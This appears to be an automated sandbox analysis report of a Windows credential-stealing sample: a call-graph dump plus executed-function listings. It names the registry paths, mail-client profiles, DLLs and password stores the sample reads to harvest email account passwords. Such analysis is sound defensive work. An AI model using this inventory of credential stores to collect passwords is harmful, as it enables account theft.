33993->33989 33994 402b14 33993->33994 33997 410a9c RegOpenKeyExA 33993->33997 33998 402a14 memset 33993->33998 34006 410b62 RegEnumKeyExA 33993->34006 33994->33989 33995->33828 33996->33993 33997->33993 34007 410b62 RegEnumKeyExA 33998->34007 34000 402a93 RegCloseKey 34000->33993 34002 402a48 34002->34000 34008 410a9c RegOpenKeyExA 34002->34008 34009 4027be 34002->34009 34024 410b62 RegEnumKeyExA 34002->34024 34006->33993 34007->34002 34008->34002 34010 40285a memset 34009->34010 34025 4029a2 RegQueryValueExA 34010->34025 34012 402885 34012->34010 34013 402998 RegCloseKey 34012->34013 34031 4021b6 memset 34012->34031 34013->34002 34015 402898 _mbscpy 34016 4029a2 4 API calls 34015->34016 34020 4028d4 34016->34020 34017 4029a2 RegQueryValueExA WideCharToMultiByte strlen memcpy 34017->34020 34018 410ab6 RegQueryValueExA 34018->34020 34020->34017 34020->34018 34032 401989 _mbscpy _mbscat _mbscat 34020->34032 34033 402624 10 API calls 34020->34033 34022 40296d _mbscpy 34034 4023e5 16 API calls 34022->34034 34024->34002 34026 4029dd 34025->34026 34030 4029f2 34025->34030 34027 4029f7 WideCharToMultiByte 34026->34027 34028 4029e9 34026->34028 34027->34030 34029 406f06 2 API calls 34028->34029 34029->34030 34030->34012 34031->34015 34032->34020 34033->34022 34034->34012 34035->33836 34036->33849 34037->33849 34038->33849 34039->33849 34040->33854 34041->33856 34042->33857 34043->33861 34044->33862 34045->33862 34046->33871 34047->33868 34048->33877 34087 4078ba 34049->34087 34052 4078ba _mbsnbcat 34053 40f5a3 RegOpenKeyExA 34052->34053 34054 40f5c3 RegQueryValueExA 34053->34054 34055 40f6d9 34053->34055 34056 40f6d0 RegCloseKey 34054->34056 34057 40f5f0 34054->34057 34055->33877 34056->34055 34057->34056 34058 40f675 34057->34058 34091 40466b _mbscpy 34057->34091 34058->34056 34092 4012ee strlen 34058->34092 34060 40f611 34062 404734 3 API calls 34060->34062 34067 40f616 34062->34067 34063 40f69e RegQueryValueExA 34063->34056 34064 40f6c1 34063->34064 34064->34056 34065 40f66a 34066 404785 FreeLibrary 34065->34066 34066->34058 34067->34065 34068 40f661 LocalFree 34067->34068 34069 40f645 memcpy 34067->34069 34068->34065 34069->34068 34093 40466b _mbscpy 34070->34093 34072 40f6fa 34073 4045db 7 API calls 34072->34073 34074 40f708 34073->34074 34075 404734 3 API calls 34074->34075 34080 40f7e2 34074->34080 34081 40f715 34075->34081 34076 404656 FreeLibrary 34077 40f7f1 34076->34077 34078 404785 FreeLibrary 34077->34078 34079 40f7fc 34078->34079 34079->33877 34080->34076 34081->34080 34082 40f797 WideCharToMultiByte 34081->34082 34083 40f7b8 strlen 34082->34083 34084 40f7d9 LocalFree 34082->34084 34083->34084 34085 40f7c8 _mbscpy 34083->34085 34084->34080 34085->34084 34086->33877 34088 4078e6 34087->34088 34089 4078c7 _mbsnbcat 34088->34089 34090 4078ea 34088->34090 34089->34088 34090->34052 34091->34060 34092->34063 34093->34072 34107 410a9c RegOpenKeyExA 34094->34107 34096 40381a 34096->33884 34105 4021b6 memset 34096->34105 34097 44458b 34097->34096 34108 410add RegQueryValueExA 34097->34108 34099 4445a4 34100 4445dc RegCloseKey 34099->34100 34109 410add RegQueryValueExA 34099->34109 34100->34096 34102 4445c1 34102->34100 34110 444879 30 API calls 34102->34110 34104 4445da 34104->34100 34105->33887 34106->33884 34107->34097 34108->34099 34109->34102 34110->34104 34111->33908 34113 4075c9 34112->34113 34114 4075bb _mbscat 34112->34114 34115 444212 34113->34115 34114->34113 34131 407e9d 34115->34131 34118 44424d 34119 444274 34118->34119 34139 444196 34118->34139 34150 407ef8 34118->34150 34120 407e9d 9 API calls 34119->34120 34127 4442a0 34120->34127 34122 407ef8 9 API calls 34122->34127 34123 4442ce 34164 407f90 34123->34164 34127->34122 34127->34123 34129 444212 65 API calls 34127->34129 34160 407e62 34127->34160 34128 407f90 FindClose 34130 4442e4 34128->34130 34129->34127 34130->33930 34132 407f90 FindClose 34131->34132 34133 407eaa 34132->34133 34134 406f06 2 API calls 34133->34134 34135 407ebd strlen strlen 34134->34135 34136 407ee1 34135->34136 34137 407eea 34135->34137 34167 4070e3 strlen _mbscat _mbscpy _mbscat 34136->34167 34137->34118 34168 406d01 CreateFileA 34139->34168 34141 4441a1 34142 44420e 34141->34142 34143 4441aa GetFileSize 34141->34143 34142->34118 34144 444203 CloseHandle 34143->34144 34145 4441bd ??2@YAPAXI SetFilePointer 34143->34145 34144->34142 34169 407560 ReadFile 34145->34169 34147 4441e4 34170 444059 34147->34170 34151 407f03 FindFirstFileA 34150->34151 34152 407f24 FindNextFileA 34150->34152 34153 407f3f 34151->34153 34154 407f46 strlen strlen 34152->34154 34155 407f3a 34152->34155 34153->34154 34158 407f7f 34153->34158 34156 407f76 34154->34156 34154->34158 34157 407f90 FindClose 34155->34157 34201 4070e3 strlen _mbscat _mbscpy _mbscat 34156->34201 34157->34153 34158->34118 34161 407e94 34160->34161 34162 407e6c strcmp 34160->34162 34161->34127 34162->34161 34163 407e83 strcmp 34162->34163 34163->34161 34165 407fa3 34164->34165 34166 407f99 FindClose 34164->34166 34165->34128 34166->34165 34167->34137 34168->34141 34169->34147 34171 44b090 34170->34171 34172 444066 wcslen ??2@YAPAXI WideCharToMultiByte 34171->34172 34185 44338b 6 API calls 34172->34185 34174 44409f 34175 4440bf strlen 34174->34175 34186 4434fc ??3@YAXPAX ??2@YAPAXI 34175->34186 34177 4440df memcpy 34187 443607 34177->34187 34179 44413d ??3@YAXPAX 34197 443473 9 API calls 34179->34197 34182 406f06 2 API calls 34182->34179 34184 44418f ??3@YAXPAX 34184->34144 34185->34174 34186->34177 34198 407948 free free 34187->34198 34189 443639 34199 407948 free free 34189->34199 34191 44391c 34191->34179 34191->34182 34192 407a1f 4 API calls 34194 443644 34192->34194 34193 443528 19 API calls 34193->34194 34194->34191 34194->34192 34194->34193 34195 44379d memcpy 34194->34195 34200 442d8e 9 API calls 34194->34200 34195->34194 34197->34184 34198->34189 34199->34194 34200->34194 34201->34158 34202->33520 34203->33524 34204->33531 34205->33530 34206->33537 34207->33534 34208->33529 34210 404785 FreeLibrary 34209->34210 34211 4041b3 34210->34211 34212 410808 FreeLibrary 34211->34212 34213 4041c4 34212->34213 34214 404785 FreeLibrary 34213->34214 34215 4041df 34214->34215 34220 404104 34215->34220 34219 4041eb ??3@YAXPAX 34219->33540 34221 4080d4 free 34220->34221 34222 404111 34221->34222 34223 4080d4 free 34222->34223 34224 40411c 34223->34224 34251 4078ed 34224->34251 34229 404143 34231 407a55 free 34229->34231 34230 404135 SetCurrentDirectoryA 34230->34229 34232 40414b 34231->34232 34233 407a55 free 34232->34233 34234 404153 34233->34234 34235 409a98 34234->34235 34236 409a32 5 API calls 34235->34236 34237 409aa6 34236->34237 34238 409ab9 34237->34238 34239 407a55 free 34237->34239 34241 407a55 free 34238->34241 34242 409acc 34238->34242 34240 409ab2 ??3@YAXPAX 34239->34240 34240->34238 34245 409ac5 ??3@YAXPAX 34241->34245 34243 409adf 34242->34243 34246 407a55 free 34242->34246 34244 409af2 free 34243->34244 34247 407a55 free 34243->34247 34244->34219 34245->34242 34248 409ad8 ??3@YAXPAX 34246->34248 34249 409aeb ??3@YAXPAX 34247->34249 34248->34243 34249->34244 34252 40412a 34251->34252 34253 4078f3 ??3@YAXPAX 34251->34253 34254 404a3a 34252->34254 34253->34252 34255 404a41 34254->34255 34256 40412f 34254->34256 34259 4047cb 11 API calls 34255->34259 34256->34229 34256->34230 34258 404a4c 34258->34256 34259->34258 34268 411853 RtlInitializeCriticalSection memset 34269 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34444 40a256 13 API calls 34446 432e5b 17 API calls 34448 43fa5a 20 API calls 34271 401060 41 API calls 34451 427260 CloseHandle memset memset 34275 410c68 FindResourceA SizeofResource LoadResource LockResource 34453 405e69 14 API calls 34277 433068 15 API calls __fprintf_l 34455 414a6d 18 API calls 34456 43fe6f 134 API calls 34279 424c6d 15 API calls __fprintf_l 34457 426741 19 API calls 34281 440c70 17 API calls 34282 443c71 44 API calls 34285 427c79 24 API calls 34460 416e7e memset __fprintf_l 34289 42800b 47 API calls 34290 425115 85 API calls __fprintf_l 34463 41960c 61 API calls 34291 43f40c 122 API calls __fprintf_l 34294 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34295 43f81a 20 API calls 34297 414c20 memset memset 34298 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34467 414625 18 API calls 34468 404225 modf 34469 403a26 strlen WriteFile 34471 40422a 12 API calls 34475 427632 memset memset memcpy 34476 40ca30 59 API calls 34477 404235 26 API calls 34299 42ec34 61 API calls __fprintf_l 34300 425115 76 API calls __fprintf_l 34478 425115 77 API calls __fprintf_l 34480 44223a 38 API calls 34306 43183c 112 API calls 34481 44b2c5 _onexit __dllonexit 34486 42a6d2 memcpy __allrem 34308 405cda 66 API calls 34494 43fedc 138 API calls 34495 4116e1 16 API calls __fprintf_l 34311 4244e6 19 API calls 34313 42e8e8 127 API calls __fprintf_l 34314 4118ee RtlLeaveCriticalSection 34500 43f6ec 22 API calls 34316 425115 119 API calls __fprintf_l 34317 410cf3 EnumResourceNamesA 34503 4492f0 memcpy memcpy 34505 43fafa 18 API calls 34507 4342f9 15 API calls __fprintf_l 34318 4144fd 19 API calls 34509 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34510 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34513 443a84 _mbscpy 34515 43f681 17 API calls 34321 404487 22 API calls 34517 415e8c 16 API calls __fprintf_l 34325 411893 RtlDeleteCriticalSection __fprintf_l 34326 41a492 42 API calls 34521 403e96 34 API calls 34522 410e98 memset SHGetPathFromIDList SendMessageA 34328 426741 109 API calls __fprintf_l 34329 4344a2 18 API calls 34330 4094a2 10 API calls 34525 4116a6 15 API calls __fprintf_l 34526 43f6a4 17 API calls 34527 440aa3 20 API calls 34529 427430 45 API calls 34333 4090b0 7 API calls 34334 4148b0 15 API calls 34336 4118b4 RtlEnterCriticalSection 34337 4014b7 CreateWindowExA 34338 40c8b8 19 API calls 34340 4118bf RtlTryEnterCriticalSection 34534 42434a 18 API calls __fprintf_l 34536 405f53 12 API calls 34348 43f956 59 API calls 34350 40955a 17 API calls 34351 428561 36 API calls 34352 409164 7 API calls 34540 404366 19 API calls 34544 40176c ExitProcess 34547 410777 42 API calls 34357 40dd7b 51 API calls 34358 425d7c 16 API calls __fprintf_l 34549 43f6f0 25 API calls 34550 42db01 22 API calls 34359 412905 15 API calls __fprintf_l 34551 403b04 54 API calls 34552 405f04 SetDlgItemTextA GetDlgItemTextA 34553 44b301 ??3@YAXPAX 34556 4120ea 14 API calls 3 library calls 34557 40bb0a 8 API calls 34559 413f11 strcmp 34363 434110 17 API calls __fprintf_l 34366 425115 108 API calls __fprintf_l 34560 444b11 _onexit 34368 425115 76 API calls __fprintf_l 34371 429d19 10 API calls 34563 444b1f __dllonexit 34564 409f20 _strcmpi 34373 42b927 31 API calls 34567 433f26 19 API calls __fprintf_l 34568 44b323 FreeLibrary 34569 427f25 46 API calls 34570 43ff2b 17 API calls 33185 444b36 33188 444b10 33185->33188 33187 444b3f 33189 444b1f __dllonexit 33188->33189 33190 444b19 _onexit 33188->33190 33189->33187 33190->33189 34571 43fb30 19 API calls 34380 414d36 16 API calls 34382 40ad38 7 API calls 34573 433b38 16 API calls __fprintf_l 34574 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34386 426741 21 API calls 34387 40c5c3 125 API calls 34389 43fdc5 17 API calls 34575 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34392 4161cb memcpy memcpy memcpy memcpy 33200 44b3cf 33201 44b3e6 33200->33201 33203 44b454 33200->33203 33201->33203 33207 44b40e 33201->33207 33204 44b405 33204->33203 33205 44b435 VirtualProtect 33204->33205 33205->33203 33206 44b444 VirtualProtect 33205->33206 33206->33203 33208 44b413 33207->33208 33210 44b454 33208->33210 33214 44b42b 33208->33214 33211 44b41c 33211->33210 33212 44b435 VirtualProtect 33211->33212 33212->33210 33213 44b444 VirtualProtect 33212->33213 33213->33210 33215 44b431 33214->33215 33216 44b435 VirtualProtect 33215->33216 33218 44b454 33215->33218 33217 44b444 VirtualProtect 33216->33217 33216->33218 33217->33218 34580 43ffc8 18 API calls 34393 4281cc 15 API calls __fprintf_l 34582 4383cc 110 API calls __fprintf_l 34394 4275d3 41 API calls 34583 4153d3 22 API calls __fprintf_l 34395 444dd7 _XcptFilter 34588 4013de 15 API calls 34590 425115 111 API calls __fprintf_l 34591 43f7db 18 API calls 34594 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34397 4335ee 16 API calls __fprintf_l 34596 429fef 11 API calls 34398 444deb _exit _c_exit 34597 40bbf0 139 API calls 34401 425115 79 API calls __fprintf_l 34601 437ffa 22 API calls 34405 4021ff 14 API calls 34406 43f5fc 149 API calls 34602 40e381 9 API calls 34408 405983 40 API calls 34409 42b186 27 API calls __fprintf_l 34410 427d86 76 API calls 34411 403585 20 API calls 34413 42e58e 18 API calls __fprintf_l 34416 425115 75 API calls __fprintf_l 34418 401592 8 API calls 33191 410b92 33194 410a6b 33191->33194 33193 410bb2 33195 410a77 33194->33195 33196 410a89 GetPrivateProfileIntA 33194->33196 33199 410983 memset _itoa WritePrivateProfileStringA 33195->33199 33196->33193 33198 410a84 33198->33193 33199->33198 34606 434395 16 API calls 34420 441d9c memcmp 34608 43f79b 119 API calls 34421 40c599 43 API calls 34609 426741 87 API calls 34425 4401a6 21 API calls 34427 426da6 memcpy memset memset memcpy 34428 4335a5 15 API calls 34430 4299ab memset memset memcpy memset memset 34431 40b1ab 8 API calls 34614 425115 76 API calls __fprintf_l 34618 4113b2 18 API calls 2 library calls 34622 40a3b8 memset sprintf SendMessageA 33219 410bbc 33222 4109cf 33219->33222 33223 4109dc 33222->33223 33224 410a23 memset GetPrivateProfileStringA 33223->33224 33225 4109ea memset 33223->33225 33230 407646 strlen 33224->33230 33235 4075cd sprintf memcpy 33225->33235 33228 410a0c WritePrivateProfileStringA 33229 410a65 33228->33229 33231 40765a 33230->33231 33233 40765c 33230->33233 33231->33229 33232 4076a3 33232->33229 33233->33232 33236 40737c strtoul 33233->33236 33235->33228 33236->33233 34433 40b5bf memset memset _mbsicmp

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 159 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 160 408450-408453 159->160 161 40841c 159->161 163 408484-408488 160->163 164 408455-40845e 160->164 162 408422-40842b 161->162 165 408432-40844e 162->165 166 40842d-408431 162->166 167 408460-408464 164->167 168 408465-408482 164->168 165->160 165->162 166->165 167->168 168->163 168->164
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040832F
                                                                                                                                                                                    • memset.MSVCRT ref: 00408343
                                                                                                                                                                                    • memset.MSVCRT ref: 0040835F
                                                                                                                                                                                    • memset.MSVCRT ref: 00408376
                                                                                                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                    • strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                    • strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                    • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                    • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                    • API String ID: 1832431107-3760989150
                                                                                                                                                                                    • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                                                                    • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                                                                                    • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                                                                    • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                                                                                                    Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                                                                                    • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                                                                                    • strlen.MSVCRT ref: 00407F5C
                                                                                                                                                                                    • strlen.MSVCRT ref: 00407F64
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                    • String ID: ACD
                                                                                                                                                                                    • API String ID: 379999529-620537770
                                                                                                                                                                                    • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                                                                                    • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                                                                                    • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                                                                                                                                                    Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                      • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                    • strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                    • strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                    • strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                    • strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                    • memset.MSVCRT ref: 00401FB1
                                                                                                                                                                                    • atoi.MSVCRT(?), ref: 00401FE0
                                                                                                                                                                                    • memset.MSVCRT ref: 00402003
                                                                                                                                                                                    • sprintf.MSVCRT ref: 00402030
                                                                                                                                                                                      • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                    • memset.MSVCRT ref: 00402086
                                                                                                                                                                                    • memset.MSVCRT ref: 0040209B
                                                                                                                                                                                    • strlen.MSVCRT ref: 004020A1
                                                                                                                                                                                    • strlen.MSVCRT ref: 004020AF
                                                                                                                                                                                    • strlen.MSVCRT ref: 004020E2
                                                                                                                                                                                    • strlen.MSVCRT ref: 004020F0
                                                                                                                                                                                    • memset.MSVCRT ref: 00402018
                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                                                                                                                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileFolderPathSpecialStrings_mbscatatoisprintf
                                                                                                                                                                                    • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                                    • API String ID: 52128907-4223776976
                                                                                                                                                                                    • Opcode ID: 0586a96bd1dd566e4e6b01723853c75a2a65919309edaf857d44129f31cda3b9
                                                                                                                                                                                    • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0586a96bd1dd566e4e6b01723853c75a2a65919309edaf857d44129f31cda3b9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                                                                                                                                                    Function 004027BE Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00402869
                                                                                                                                                                                      • Part of subcall function 004029A2: RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,770145ED,?,00000000), ref: 004028A3
                                                                                                                                                                                      • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,770145ED,?,00000000), ref: 0040297B
                                                                                                                                                                                      • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                                    • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                                    • API String ID: 1497257669-167382505
                                                                                                                                                                                    • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                    • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                                                                                                    • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                    • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                                                                                                                    Function 0040CF44 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                                                                                      • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                                      • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                                                                                      • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                                                    • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                                                    • API String ID: 745651260-375988210
                                                                                                                                                                                    • Opcode ID: 281cc72733d93a48e74a4e104f31179254ddf1e53b96f5d983554f03d68ac606
                                                                                                                                                                                    • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                                                                                                    • Opcode Fuzzy Hash: 281cc72733d93a48e74a4e104f31179254ddf1e53b96f5d983554f03d68ac606
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                                                                                                                                                    Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(pstorec.dll), ref: 00403C35
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • pstorec.dll, xrefs: 00403C30
                                                                                                                                                                                    • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                                                                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                                                                                    • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                                                                                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                                                                                    • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                                                                                    • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                                                                                    • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                                                                                    • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                                                                                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                                                                                    • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                                                                                    • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc_mbscpy
